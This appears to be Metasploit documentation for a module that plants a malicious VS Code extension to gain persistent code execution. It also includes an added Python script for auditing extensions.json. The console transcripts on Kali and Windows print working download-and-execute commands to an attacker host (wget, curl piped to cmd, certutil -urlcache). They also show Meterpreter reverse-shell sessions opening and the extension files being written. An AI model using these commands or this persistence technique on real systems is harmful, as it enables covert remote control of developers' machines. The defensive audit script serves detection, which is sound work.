Path: blob/master/documentation/modules/exploit/multi/persistence/vscode_extension.md
## Vulnerable Application
This module installs a malicious VS Code extension into the target's VS Code extensions directory. The extension executes the payload each time VS Code is launched, providing persistent code execution. Supports VS Code, VS Code Insiders, VSCodium, VS Code Server, and Cursor.
Tested against VS Code 1.120.0 on Kali and Windows 10.
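The artifacts this module leaves behind (an extension folder holding `package.json`, `extension.js` and a dropped payload file, plus a new entry in `extensions.json`) are also what a defender can audit for. The Python check below is an added example, not part of the module or of Metasploit: it assumes the `extensions.json` entry layout (`identifier.id`, `relativeLocation`, `metadata`), assumes a side-loaded entry carries no Marketplace metadata and activates on `*`, and runs against constructed sample data in a temporary directory, reusing the extension name from the Kali scenario.

```python
import json
import os
import tempfile

STARTUP_EVENTS = {"*", "onStartupFinished"}  # activation that needs no user action
DOC_FILES = {"LICENSE", "CHANGELOG", "README"}  # benign files that commonly lack an extension

def audit_extensions(ext_dir):
    """Return {extension_id: [reasons]} for extensions.json entries worth a closer look."""
    findings = {}
    with open(os.path.join(ext_dir, "extensions.json"), encoding="utf-8") as fh:
        registry = json.load(fh)
    for entry in registry:
        reasons = []
        # Assumption: Marketplace installs record metadata (publisher id, install timestamp);
        # an entry appended to extensions.json by another process usually carries none.
        if not entry.get("metadata"):
            reasons.append("no install metadata")
        folder = os.path.join(ext_dir, entry["relativeLocation"])
        with open(os.path.join(folder, "package.json"), encoding="utf-8") as fh:
            events = set(json.load(fh).get("activationEvents", []))
        if events & STARTUP_EVENTS:
            reasons.append("activates on launch: " + ", ".join(sorted(events & STARTUP_EVENTS)))
        # Heuristic: top-level files with no extension (e.g. a dropped binary) are rare in real extensions.
        odd = sorted(f for f in os.listdir(folder) if "." not in f and f.upper() not in DOC_FILES
                     and os.path.isfile(os.path.join(folder, f)))
        if odd:
            reasons.append("extension-less files: " + ", ".join(odd))
        if reasons:
            findings[entry["identifier"]["id"]] = reasons
    return findings

def build_sample_dir():
    """Constructed sample data: one Marketplace-like entry, one side-loaded entry shaped like the module's output."""
    root = tempfile.mkdtemp()
    files = {
        "extensions.json": [
            {"identifier": {"id": "sample.benign"}, "version": "1.2.3", "relativeLocation": "sample.benign-1.2.3",
             "metadata": {"publisherId": "PLACEHOLDER-ID", "installedTimestamp": 1700000000000}},
            {"identifier": {"id": "fkhtvcu.cjfkvxfx"}, "version": "1.0.0", "relativeLocation": "fkhtvcu.cjfkvxfx-1.0.0"}],
        "sample.benign-1.2.3/package.json": {"activationEvents": ["onLanguage:python"]},
        "fkhtvcu.cjfkvxfx-1.0.0/package.json": {"activationEvents": ["*"], "main": "./extension.js"},  # "*" assumed
        "fkhtvcu.cjfkvxfx-1.0.0/extension.js": "// constructed stub, not the module's code",
        "fkhtvcu.cjfkvxfx-1.0.0/external": "",
    }
    for rel, data in files.items():
        os.makedirs(os.path.dirname(os.path.join(root, rel)), exist_ok=True)
        with open(os.path.join(root, rel), "w", encoding="utf-8") as fh:
            fh.write(data if isinstance(data, str) else json.dumps(data))
    return root
```

Point `audit_extensions` at a real `~/.vscode/extensions` (or the Insiders, VSCodium, Server or Cursor equivalent) to review what is registered there; the heuristics are starting points and will need tuning against the extensions an organisation actually uses.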
## Verification Steps
1. Install the application
2. Start msfconsole
3. Get a shell
4. Do: `use exploit/multi/persistence/vscode_extension`
5. Do: `run`
6. You should get a shell when VS Code opens next
## Options
### NAME

Name of the extension (Random if left blank). Defaults to ``.

### PUBLISHER

Publisher name for the extension (Random if left blank). Defaults to ``.

### DESCRIPTION

Description of the extension (Random if left blank). Defaults to ``.

### USER

User to target, or current user if blank (Random if left blank). Defaults to ``.

### ICON

Local path to an icon file (PNG) to include with the extension. Defaults to no icon.
## Scenarios
### VSCode 1.120.0 on Kali
#### Original Shell
```
resource (/root/.msf4/msfconsole.rc)> setg verbose true
verbose => true
resource (/root/.msf4/msfconsole.rc)> setg lhost 1.1.1.1
lhost => 1.1.1.1
resource (/root/.msf4/msfconsole.rc)> use exploit/multi/script/web_delivery
[*] Using configured payload python/meterpreter/reverse_tcp
resource (/root/.msf4/msfconsole.rc)> set target 7
target => 7
resource (/root/.msf4/msfconsole.rc)> set srvport 8082
srvport => 8082
resource (/root/.msf4/msfconsole.rc)> set uripath l
uripath => l
resource (/root/.msf4/msfconsole.rc)> set payload payload/linux/x64/meterpreter/reverse_tcp
payload => linux/x64/meterpreter/reverse_tcp
resource (/root/.msf4/msfconsole.rc)> set lport 4446
lport => 4446
resource (/root/.msf4/msfconsole.rc)> run
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
[*] Started reverse TCP handler on 1.1.1.1:4446
[*] Using URL: http://1.1.1.1:8082/l
[*] Server started.
[*] Run the following command on the target machine:
wget -qO jNobBPgs --no-check-certificate http://1.1.1.1:8082/l; chmod +x jNobBPgs; ./jNobBPgs& disown
msf exploit(multi/script/web_delivery) >
[*] 1.1.1.1 web_delivery - Delivering Payload (250 bytes)
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (3090404 bytes) to 1.1.1.1
[*] Meterpreter session 1 opened (1.1.1.1:4446 -> 1.1.1.1:60886) at 2026-05-15 08:54:57 -0400
msf exploit(multi/script/web_delivery) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > getuid
Server username: h00die
meterpreter > sysinfo
Computer     : h00die-kali
OS           : Debian (Linux 6.19.14+kali-amd64)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > background
[*] Backgrounding session 1...
```
#### Persistence
```
msf exploit(multi/script/web_delivery) > use exploit/multi/persistence/vscode_extension
[*] No payload configured, defaulting to cmd/windows/http/x64/meterpreter/reverse_tcp
msf exploit(multi/persistence/vscode_extension) > set session 1
session => 1
msf exploit(multi/persistence/vscode_extension) > set target 1
target => 1
msf exploit(multi/persistence/vscode_extension) > set payload cmd/linux/http/x64/meterpreter/reverse_tcp
payload => cmd/linux/http/x64/meterpreter/reverse_tcp
msf exploit(multi/persistence/vscode_extension) > exploit
[*] Command to run on remote host: curl -so ./iMMtopaQ http://1.1.1.1:8080/h21lOsiTyFK6CgBlUqDgZQ;chmod +x ./iMMtopaQ;./iMMtopaQ&
[*] Exploit running as background job 1.
[*] Exploit completed, but no session was created.
msf exploit(multi/persistence/vscode_extension) >
[*] Fetch handler listening on 1.1.1.1:8080
[*] HTTP server started
[*] Adding resource /h21lOsiTyFK6CgBlUqDgZQ
[*] Started reverse TCP handler on 1.1.1.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Target user: h00die
[+] The target appears to be vulnerable. VS Code extensions directory found: /root/.vscode/extensions
[*] Using extension: fkhtvcu.cjfkvxfx-1.0.0
[*] Target user: h00die
[*] Installing to: /root/.vscode/extensions
[*] Creating extension directory: /root/.vscode/extensions/fkhtvcu.cjfkvxfx-1.0.0
[*] Creating directory /root/.vscode/extensions/fkhtvcu.cjfkvxfx-1.0.0
[*] /root/.vscode/extensions/fkhtvcu.cjfkvxfx-1.0.0 created
[+] Wrote package.json to /root/.vscode/extensions/fkhtvcu.cjfkvxfx-1.0.0/package.json
[+] Wrote extension.js to /root/.vscode/extensions/fkhtvcu.cjfkvxfx-1.0.0/extension.js
[+] Wrote payload to /root/.vscode/extensions/fkhtvcu.cjfkvxfx-1.0.0/external
[*] Reading extensions.json...
[+] Registered extension in /root/.vscode/extensions/extensions.json
[!] VS Code is currently running - restart VS Code to activate the extension.
[*] Meterpreter-compatible Cleanup RC file: /root/.msf4/logs/persistence/h00die-kali_20260515.5724/h00die-kali_20260515.5724.rc
[*] Client 1.1.1.1 requested /h21lOsiTyFK6CgBlUqDgZQ
[*] Sending payload to 1.1.1.1 (curl/8.19.0)
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (3090404 bytes) to 1.1.1.1
[*] Meterpreter session 2 opened (1.1.1.1:4444 -> 1.1.1.1:60160) at 2026-05-15 08:57:46 -0400
```
### VSCode 1.120.0 on Windows 10
#### Original Shell
```
resource (/root/.msf4/msfconsole.rc)> setg verbose true
verbose => true
resource (/root/.msf4/msfconsole.rc)> setg lhost 1.1.1.1
lhost => 1.1.1.1
resource (/root/.msf4/msfconsole.rc)> use payload/cmd/windows/http/x64/meterpreter_reverse_tcp
resource (/root/.msf4/msfconsole.rc)> set fetch_command CURL
fetch_command => CURL
resource (/root/.msf4/msfconsole.rc)> set fetch_pipe true
fetch_pipe => true
resource (/root/.msf4/msfconsole.rc)> set lport 4450
lport => 4450
resource (/root/.msf4/msfconsole.rc)> set FETCH_URIPATH w3
FETCH_URIPATH => w3
resource (/root/.msf4/msfconsole.rc)> set FETCH_FILENAME mkaKJBzbDB
FETCH_FILENAME => mkaKJBzbDB
resource (/root/.msf4/msfconsole.rc)> to_handler
[*] Command served: curl -so %TEMP%\mkaKJBzbDB.exe http://1.1.1.1:8080/sDEHsFj37VRR4ySrr8_b_w & start /B %TEMP%\mkaKJBzbDB.exe
[*] Command to run on remote host: curl -s http://1.1.1.1:8080/w3|cmd
[*] Payload Handler Started as Job 0
[*] Fetch handler listening on 1.1.1.1:8080
[*] HTTP server started
[*] Adding resource /sDEHsFj37VRR4ySrr8_b_w
[*] Adding resource /w3
[*] Started reverse TCP handler on 1.1.1.1:4450
msf payload(cmd/windows/http/x64/meterpreter_reverse_tcp) >
[*] Client 2.2.2.2 requested /w3
[*] Sending payload to 2.2.2.2 (curl/8.13.0)
[*] Client 2.2.2.2 requested /sDEHsFj37VRR4ySrr8_b_w
[*] Sending payload to 2.2.2.2 (curl/8.13.0)
[*] Meterpreter session 1 opened (1.1.1.1:4450 -> 2.2.2.2:64885) at 2026-05-15 08:37:21 -0400
msf payload(cmd/windows/http/x64/meterpreter_reverse_tcp) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > getuid
Server username: DESKTOP-3PTMHF3\h00die
meterpreter > sysinfo
Computer        : DESKTOP-3PTMHF3
OS              : Windows 10 22H2+ (10.0 Build 19045).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x64/windows
meterpreter > background
[*] Backgrounding session 1...
```
#### Persistence
```
msf payload(cmd/windows/http/x64/meterpreter_reverse_tcp) > use exploit/multi/persistence/vscode_extension
[*] No payload configured, defaulting to cmd/windows/http/x64/meterpreter/reverse_tcp
msf exploit(multi/persistence/vscode_extension) > set target 0
target => 0
msf exploit(multi/persistence/vscode_extension) > set payload cmd/windows/http/x64/meterpreter/reverse_tcp
payload => cmd/windows/http/x64/meterpreter/reverse_tcp
msf exploit(multi/persistence/vscode_extension) > set session 1
session => 1
msf exploit(multi/persistence/vscode_extension) > exploit
[*] Command to run on remote host: certutil -urlcache -f http://1.1.1.1:8080/Jy5WA3Epc63uV93PB0rHzw %TEMP%\VGCHkxyx.exe & start /B %TEMP%\VGCHkxyx.exe
[*] Exploit running as background job 1.
[*] Exploit completed, but no session was created.
[*] Fetch handler listening on 1.1.1.1:8080
[*] HTTP server started
[*] Adding resource /Jy5WA3Epc63uV93PB0rHzw
[*] Started reverse TCP handler on 1.1.1.1:4444
msf exploit(multi/persistence/vscode_extension) >
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Target user: h00die
[+] The target appears to be vulnerable. VS Code extensions directory found: C:\Users\h00die\.vscode\extensions
[*] Using extension: oiok.niuvribguy-1.0.0
[*] Target user: h00die
[*] Installing to: C:\Users\h00die\.vscode\extensions
[*] Creating extension directory: C:\Users\h00die\.vscode\extensions\oiok.niuvribguy-1.0.0
[*] Creating directory C:\Users\h00die\.vscode\extensions\oiok.niuvribguy-1.0.0
[*] C:\Users\h00die\.vscode\extensions\oiok.niuvribguy-1.0.0 created
[+] Wrote package.json to C:\Users\h00die\.vscode\extensions\oiok.niuvribguy-1.0.0\package.json
[+] Wrote extension.js to C:\Users\h00die\.vscode\extensions\oiok.niuvribguy-1.0.0\extension.js
[+] Wrote payload to C:\Users\h00die\.vscode\extensions\oiok.niuvribguy-1.0.0\external
[*] Reading extensions.json...
[+] Registered extension in C:\Users\h00die\.vscode\extensions\extensions.json
[*] VS Code is not running - launch it to trigger the extension.
[*] Meterpreter-compatible Cleanup RC file: /root/.msf4/logs/persistence/DESKTOP-3PTMHF3_20260515.4157/DESKTOP-3PTMHF3_20260515.4157.rc
[*] Client 2.2.2.2 requested /Jy5WA3Epc63uV93PB0rHzw
[*] Sending payload to 2.2.2.2 (Microsoft-CryptoAPI/10.0)
[*] Client 2.2.2.2 requested /Jy5WA3Epc63uV93PB0rHzw
[*] Sending payload to 2.2.2.2 (CertUtil URL Agent)
[*] Sending stage (248902 bytes) to 2.2.2.2
[*] Meterpreter session 2 opened (1.1.1.1:4444 -> 2.2.2.2:65022) at 2026-05-15 08:42:16 -0400
```